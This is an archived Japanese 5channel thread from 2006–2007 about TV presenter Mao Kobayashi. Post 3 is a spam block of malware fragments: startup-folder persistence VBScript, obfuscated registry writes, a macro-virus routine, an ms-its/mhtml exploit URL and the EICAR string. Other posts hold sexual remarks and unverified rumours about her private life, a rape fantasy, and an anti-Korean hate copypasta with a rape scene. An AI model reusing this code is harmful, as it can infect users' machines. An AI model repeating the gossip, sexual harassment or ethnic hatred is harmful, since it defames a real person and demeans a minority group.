5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

超清純女優☆小林麻央☆生娘2

1 :名無しさん@お腹いっぱい。:2006/09/01(金) 19:44:04 ID:OXpL4l4E



前スレ
「超清純女優☆小林麻央。生娘22歳。」
http://makimo.to/2ch/tv7_actress/1118/1118472125.html
http://makimo.to/cgi-bin/search/search.cgi?q=%8F%AC%97%D1%96%83%89%9B&andor=AND&sf=2&H=&view=table&all=on&shw=&D=occult
<公式サイト>                       
http://www.kobayashi-mao.com/index.html
http://www.centforce.com/profile/t_profile/kobayashimao.html
<プロフィール>
http://www.centforce.com/profile/t_profile/kobayashimao.html
<まお日記>
Bhttp://ameblo.jp/kobayashi-mao/
( @http://www.centforce.com/diarymao.html http://www.centforce.com/mao/index.html )
( Ahttp://www.kobayashi-mao.com/diary/sfs6_diary/ )
<俺たちは強い>
http://www.oretati.x0.com/bbs/cgi-bin6/mao.html

DVDドラマ、映画の「東京フレンズ」に出演。
「めざまし土曜日」のお天気お姉さんを9月いっぱいで卒業。
10/2(月)スタートの新ニュース番組「ZERO」(日本テレビ系列、月〜金 夜22:54〜)でキャスターを務めることか決定!(出演は月〜木)。50年以上続いた「きょうの出来事」のあとを継ぐ大型番組。
また、TBSの「HAPPY2」にも出演決定!
羽ばたけ! マオマオ!


※ アンチ、基地外は完全スルーで(`・ω・´)マターリ


2 :名無しさん@お腹いっぱい。:2006/09/01(金) 20:58:43 ID:4q8Nmm7+
アラ、いいですねぇ☆

3 :<body onload=window()>:2006/09/01(金) 22:59:53 ID:kM7kMX0X
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

4 :名無しさん@お腹いっぱい。:2006/09/03(日) 12:57:11 ID:7/LYvNm7
ヨン様

5 :名無しさん@お腹いっぱい。:2006/09/06(水) 14:52:53 ID:ahmzbmAk
しけん

6 :名無しさん@お腹いっぱい。:2006/09/07(木) 18:15:03 ID:rdV6tiCq
かわいいね-美人だね-
頭もいいね-これで性格もいいなら完璧だと思う。俺のなかでは
一番の理想だな。 がんばれ麻央ちゃん

7 :名無しさん@お腹いっぱい。:2006/09/08(金) 06:11:41 ID:83NqVarE
ハッピー2の放送は、年末?

8 :名無しさん@お腹いっぱい。:2006/09/08(金) 07:10:31 ID:KVdVctZu
そうらしいな!

9 :名無しさん@お腹いっぱい。:2006/09/08(金) 08:14:22 ID:IxwhQYzU
ああそうともさ。
まおは頬骨おばけさ。
でも声としゃべりがかわいい。

10 :名無しさん@お腹いっぱい。:2006/09/08(金) 22:43:40 ID:9Z3+bNhu
マオ好きだわ

11 :名無しさん@お腹いっぱい。:2006/09/09(土) 23:00:44 ID:aDbJIAUB
めざまど卒業は、番組内で発表されてる?
関西地区では、カットされてるのかな?

12 :名無しさん@お腹いっぱい。:2006/09/09(土) 23:35:06 ID:af15NjXm
キモオタが多そうなスレだな

13 :名無しさん@お腹いっぱい。:2006/09/10(日) 01:10:52 ID:LTKo3u2N
赤い衣裳のミニスカは可愛かったね。ZEROでも、これぐらいやって、イケメン
関学MCにアピールするのかな?

14 :名無しさん@お腹いっぱい。:2006/09/10(日) 05:09:28 ID:SaPXWPOH
んだな!麻央の美脚を見れたからマジ最高だったぜ(爆)

15 :名無しさん@お腹いっぱい。:2006/09/12(火) 10:08:08 ID:/u8C2BBM

国学院高校時代の小林麻央さんの同級生の男性から聞いた話なのですが

恋から出演時に社交ダンスを始めたそうで、
その時、知り合った彼(確か30歳位)がいて番組卒業後に
経験されたそうですよ。

さすがに番組出演時には多くの知り合いが観てるのでキスまで許して、
それ以上のことは彼を説得して無かったそうです。

出演中に「経験したら発表せい!!」と
さんまさんに、何度も言われていたそうなのですが。
なので現在はバージンではないみたいですよ。

同級生の彼は
「そんなの計算高くてあまり好感持てない、男を馬鹿にしている!!
彼女は本当の恋愛をしていない!!」
などと言っていましたが女性からしたら、それが普通の考えではないかな?
と思いました。

書いた私が言うのも変なのですが確かな情報なので、あまり
麻央さんを馬鹿にしたカキコは抑えてほしいです。
本人はバージンのことを凄く気にしていて今でも悲しい気持ちに
なるそうです。

16 :名無しさん@無名タレント:2006/09/12(火) 11:47:09 ID:UsuQpJ+1
姉ちゃんと妹を並べて
入れまくりたいよ〜

17 :名無しさん@お腹いっぱい。:2006/09/12(火) 13:24:56 ID:XYGMSW0Q
>>15
気にしてるんだったらそもそも恋からへの出演自体断るべきだった。
恐らく姉絡みで出演にこぎつけたんだろうが、そういう意味では姉の罪も重いなw

18 :名無しさん@お腹いっぱい。:2006/09/15(金) 00:56:20 ID:KDXKomMu
>>15童貞妄想乙!

19 :名無しさん@お腹いっぱい。:2006/09/19(火) 23:18:47 ID:bi2t3bnV
なぜ麻央はから騒ぎに出演したんだ?

芸能人になりたい為に出演して現在に至ってるのか?

20 :名無しさん@お腹いっぱい。:2006/09/20(水) 00:28:06 ID:Nzqbt1aY
麻耶に写メ見せてもらった菅ちゃんが一目ぼれしてスカウトした

21 :名無しさん@お腹いっぱい。:2006/09/20(水) 00:44:51 ID:3sllzO9V
まあ、ZEROがこけたら、さんまさんでも狙うのかな?自己保身もかけて。

22 :名無しさん@お腹いっぱい。:2006/09/20(水) 02:08:11 ID:e/jSO8Mm
アンチ小林麻央スレ
http://tv7.2ch.net/test/read.cgi/actress/1157297364/

同窓生らしき書き込みあり。

23 :名無しさん@お腹いっぱい。:2006/09/21(木) 01:58:50 ID:RY/fJekv
フジ系「魁さきがけ」新司会にマオマオ決定!!

今テレビで見た。

24 :名無しさん@お腹いっぱい。:2006/09/28(木) 14:17:11 ID:4L+Dt1Cv
ttp://www.sponichi.co.jp/entertainment/news/2006/09/28/02.html
>麻由さんは身長1メートル53で、「小林麻央さんを素朴にした感じ」(関係者)。


25 :名無しさん@お腹いっぱい。:2006/09/28(木) 18:02:26 ID:3fESa3dk
「田岡一雄自伝」より
通りすがりの通行人の目つきが気に食わないといっては難くせをつけ、
無銭飲食をし、白昼の路上で集団で婦女子にいたずらをする。
善良な市民は恐怖のどん底に叩き込まれた。
こういった不良分子は旧陸海軍の飛行服を好んで身につけていた。
袖に腕章をつけ、半長靴をはき、純白の絹のマフラーを首に巻きつけ、
肩で風を切って町をのし歩いた。
腰には拳銃をさげ、白い包帯を巻きつけた鉄パイプの凶器を引っさげた彼らの
略奪、暴行には目にあまるものがあった。
警官が駆けつけてきても手も足も出ない。
「俺たちは戦勝国民だ。敗戦国の日本人が何をいうか」
警官は小突き回され、サーベルはヘシ曲げられ、
街は暴漢の跳梁に無警察状態だ。
〜中略〜
一瞬、ぎくりと立ちどまり、悲鳴のあがる方角に走った。
途中で四、五歳の女の子が泣きながら夢中で駆け寄ってきた。
「どないしたんや」
「おかあちゃんが、おかあちゃんが」
少女は私に泣きじゃくりながらしがみつく。
この世のものとは思えぬ女の狂気じみた悲鳴がきこえつづけていた。
「ここにいるんやで。ええな」
私は少女をその場において一目散に走った。
少女の母親は木立の中で数人の男に犯されていた。飛行服の男たちだった。
------------------------------------------------------
創氏改名は屈辱だったと言うわりに通名を名乗る在日
実態は戦後に悪さをしすぎて日本人に嫌悪されたため
通名という都合のいい偽名を使うようになったのである
http://school.jp.land.to/page1_2.html


26 :名無しさん@お腹いっぱい。:2006/09/29(金) 13:40:13 ID:j7SCouB2

>>15

もっと詳しく教えてください。

キモイ人がいなくなるように・・・



27 :名無しさん@お腹いっぱい。:2006/09/29(金) 23:41:01 ID:AmXJYriG
セントフォース
   ‖
Cent→1ドルの100分の1
Force→第4or暴力
   ‖
CentForce→4セント?

28 :名無しさん@お腹いっぱい。:2006/09/30(土) 12:01:55 ID:NGJ9h2BR
>>27 いいとこに目を止めましたね。
Centは、わずかなという意味でしょう。
FORCEは、力でしょうね。

29 :名無しさん@お腹いっぱい。:2006/10/01(日) 02:07:38 ID:5V+4HUrg
ニュースゼロでは、椅子に座るのか?
パンチラのヨカーン。

30 :名無しさん@お腹いっぱい。:2006/10/01(日) 03:31:13 ID:Ma6ejXJW
麻央ちゃんのパンチラを拝みたいもんだ

31 :名無しさん@お腹いっぱい。:2006/10/02(月) 09:07:44 ID:r147QbHg
>>28
わずかなチカラしかない事務所か?

32 :名無しさん@お腹いっぱい。:2006/10/02(月) 09:23:57 ID:2NfkD1TF

絶対に生娘では無い!

33 :名無しさん@お腹いっぱい。:2006/10/02(月) 23:54:18 ID:qZTPPUG1


普通にブスじゃん




34 :名無しさん@お腹いっぱい。:2006/10/05(木) 22:35:02 ID:7OgCjNvd
>>32童貞妄想乙!
>>33童貞死ね!

35 :名無しさん@お腹いっぱい。:2006/10/06(金) 07:26:12 ID:8CHEiTJM
ブスと言う奴の面みてみたいもんだな!麻央はかわいいと思うんだがな(笑)

36 :名無しさん@お腹いっぱい。:2006/10/06(金) 08:36:09 ID:Ac6+GsP9
>>31微力ながらという日本的な謙虚な表現なんじゃない?

37 :名無しさん@お腹いっぱい。:2006/10/06(金) 10:36:56 ID:YCNIJ8wL
絶対に生娘では無いし、童貞も死ななくて良し

38 :名無しさん@お腹いっぱい。:2006/10/10(火) 19:59:09 ID:X9isMLU5
フジのグータンで中学から付き合ってた彼氏がいたと本人が言ってたよ
から騒ぎでスタッフにキャラとしてバージンと言わされてたと言ってたよ

39 :名無しさん@お腹いっぱい。:2006/10/11(水) 23:05:05 ID:gJ4XA4H2
>>38童貞妄想乙!

40 :名無しさん@お腹いっぱい。:2006/10/11(水) 23:49:23 ID:IN8uDoO8
こいつ気取ってる割にニュースろくに読めないわ、来月の四月からとか訳のわからん間違いするわ、悲惨だな。
他局と比べても明らかに劣ってる。
打ち切りだな。
まともなヤツが一人もいない番組作るなよー
ちなみに芸能人で生娘なんて皆無。

41 :名無しさん@お腹いっぱい。:2006/10/12(木) 00:16:07 ID:u9MIntka
なんで、こんなしっかりして無い子をキャスターとして日テレも使うんだか・・。ま
あ、番組自体も勢いないからね・・・。4月から、またバラエティー周りだろうね・
・。女優業も大成しなかったのがケチの付き始め。

42 :名無しさん@お腹いっぱい。:2006/10/12(木) 02:17:38 ID:WuSUKnif
女優業はこれからですよ。
HPPY2もやるし。

43 :名無しさん@お腹いっぱい。:2006/10/12(木) 18:19:50 ID:T0lx6RNE
んだな!予想以上にうまく原稿読んでいると思うぞ(笑)

44 :名無しさん@お腹いっぱい。:2006/10/12(木) 18:50:02 ID:iG/5u2hR
何度でも言う!
絶対に生娘では無い!

45 :名無しさん@お腹いっぱい。:2006/10/15(日) 06:13:21 ID:B9GN8rlD
そりゃそうだ。
公式日記にやんわりと書いてあるし。

46 :名無しさん@お腹いっぱい。:2006/10/15(日) 12:47:07 ID:aZxyfOw7
みんなには悪いが
仁王立ちフェラから口内発射しちゃった
夢の中だが・・・。


47 :名無しさん@お腹いっぱい。:2006/10/15(日) 16:34:05 ID:m6xpFtJJ
麻美と言う妹さんがいるの知らないのか?

48 :名無しさん@お腹いっぱい。:2006/10/15(日) 16:35:56 ID:dW/bs5CB
今日の天気はど〜よ〜
……………………………………………やめてくれ

49 :名無しさん@お腹いっぱい。:2006/10/17(火) 00:03:04 ID:uCVa6bjc
ZEROでラルフ鈴木が
「新潟出身なのに?」
みたいなこと言ったよね?東京じゃなかったのW

50 :名無しさん@お腹いっぱい。:2006/10/17(火) 02:36:38 ID:3t7+nZmQ
生まれが新潟で、すぐ引っ越した

51 :名無しさん@お腹いっぱい。:2006/10/20(金) 06:47:43 ID:irhcNlw8
女優なのか?よくわからないポジションだな・・・
今も処女なのか?まぁ空騒ぎに出てた22歳の時の素人時代も
処女ってのは嘘くさいと思ったがな・・・
姉妹揃って強かでドス黒い内面を持ってそうなイメージはあるが
姉ちゃんの方が、憎めない感じで好きだな

52 :名無しさん@お腹いっぱい。:2006/10/20(金) 17:04:50 ID:GdaX6OT4
そのうちお塩先生に処女を奪われそう

53 :名無しさん@お腹いっぱい。:2006/10/20(金) 19:49:36 ID:irhcNlw8
もろAV顔じゃね?AVに中途半端なアナウンサーなんかならないで
AVにでりゃよかったのに・・・

54 :名無しさん@お腹いっぱい。:2006/10/20(金) 21:06:40 ID:hws2RUj8
今はなんでもこなすマルチタレントが主流だからなんでもやって

結婚したり、離婚したり、旅番組にときどき出たりするようになる。

舞台に流れたり、ドラマも時々出る。

55 :名無しさん@お腹いっぱい。:2006/10/21(土) 01:37:51 ID:W584l3iC
からさわぎに出たのは19歳だよ、アホ。
あれから5年。

テレビでお泊りデートの話をして突っ込まれるようにもなったんだよ、バカども。

56 :名無しさん@お腹いっぱい。:2006/10/22(日) 01:15:49 ID:mTdQl42c
つまり麻央は未だに処女だってことか

57 :見ちゃった:2006/10/23(月) 23:32:59 ID:iSdcT1zs
週末、博士太郎とホテルで会ってたよ。

58 :名無しさん@お腹いっぱい。:2006/10/24(火) 11:40:41 ID:fODJtCmy
http://www.37vote.net/announce/1161645565/

59 :名無しさん@お腹いっぱい。:2006/10/24(火) 14:00:34 ID:pizh0ZKh
どブス

60 :名無しさん@お腹いっぱい。:2006/10/25(水) 07:48:03 ID:5hK2mRrh
とドブのようなブスが申しております

61 :名無しさん@お腹いっぱい。:2006/11/16(木) 22:57:45 ID:/I9eE3v+
 

62 :名無しさん@自治スレで板設定値議論中:2006/11/29(水) 17:17:44 ID:yiWz2DWh
最近好きになった。マジかわいい。

63 :名無しさん@自治スレで板設定値議論中:2006/11/30(木) 01:21:50 ID:mP14Voug
処女だから
かわいいのは当たり前

64 :名無しさん@自治スレで板設定値議論中:2006/11/30(木) 04:38:56 ID:Dme59Ev/
ブス


65 :名無しさん@自治スレで板設定値議論中:2006/11/30(木) 04:52:34 ID:0vmKorfj
>>64
貴様がブスじゃねえの?どんなヅラして言ってんねん(爆)

66 :名無しさん@自治スレで板設定値議論中:2006/11/30(木) 10:18:29 ID:SL/hOFoi
ドブス

67 :名無しさん@自治スレで板設定値議論中:2006/12/01(金) 19:58:43 ID:cofb2mM2
週刊誌の特大号で特集されてたのって、なんだっけ?

68 :名無し:2006/12/01(金) 20:31:41 ID:c48oNV0F
テレビ局に入社してから、イケメン金持ちディレクターに、パフパ
フパフパフパフパフバコバコバコバコされてるよもう。

69 :名無し:2006/12/01(金) 20:36:49 ID:c48oNV0F
こんなことされたの初めてよ〜!!

70 :名無しさん@自治スレで板設定値議論中:2006/12/06(水) 03:50:34 ID:mkJkGVYx
そもそもなにものだよコイツ

ブス

71 :名無しさん@お腹いっぱい。:2006/12/09(土) 22:58:20 ID:3eU0N57r
マオマオ次スレ
http://pie.bbspink.com/test/read.cgi/girls/1165672185/l50

72 :名無しさん@お腹いっぱい。:2006/12/15(金) 05:57:12 ID:unpHID7V
ラジオ2週目
http://www.tbs.co.jp/happy2006/movie/index-j.html


73 :記念上げ:2006/12/26(火) 19:10:09 ID:ukVbaDy3



いよいよ今日9時から「Happy2」だよ!

74 :名無しさん@お腹いっぱい。:2007/01/07(日) 00:53:44 ID:P0Id+NI5
ちょっとは脱いでくれよ

75 :名無しさん@お腹いっぱい。:2007/01/08(月) 00:28:11 ID:mrJ5OmC9
Music Loversでオッパイすけて見えとった。
いつか脱いでくれないかな。
かわいいハダカなんだろうな。

76 :名無しさん@お腹いっぱい。:2007/01/09(火) 22:53:21 ID:FJKYgzvt
ブス


77 :名無しさん@お腹いっぱい。:2007/01/13(土) 10:35:18 ID:4EiECSRU
超かわいい

78 :名無しさん@お腹いっぱい。:2007/01/22(月) 09:19:28 ID:NcucCEhm0
キモイ
糞タレ


79 :名無しさん@お腹いっぱい。:2007/01/29(月) 23:31:32 ID:GcbEKHXf0


80 :瀑す:2007/02/03(土) 21:14:51 ID:FnI3qwDxO
麻央マジいいから!アンチ死ねギャハはは!麻央いつかおかすぜ〜フォー!!

81 :名無しさん@お腹いっぱい。:2007/02/11(日) 23:08:47 ID:5/b/oGX90
うるるん見逃した。。。

82 :名無しさん@お腹いっぱい。:2007/02/11(日) 23:17:19 ID:5/b/oGX90
と思ったらゲストか。レポーターかと思ったぜ。

83 :名無しさん@お腹いっぱい。:2007/02/12(月) 19:07:00 ID:KZduT41UO
昨日の悲しそうな表情が良かった。

84 :名無しさん@お腹いっぱい。:2007/02/21(水) 16:20:09 ID:IQwVUIGFO
>>75
うp

17 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)